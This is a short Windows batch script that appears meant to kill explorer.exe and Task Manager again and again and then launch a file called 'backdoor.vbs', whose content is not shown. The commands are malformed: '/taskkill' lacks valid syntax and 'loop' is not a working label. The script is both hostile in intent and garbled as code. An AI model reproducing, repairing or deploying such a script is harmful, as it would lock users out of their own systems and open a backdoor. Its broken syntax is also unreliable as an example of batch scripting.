@echo off
/taskkill explorer.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill explorer.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
/taskkill taskmgr.exe
loop
backdoor.vbs
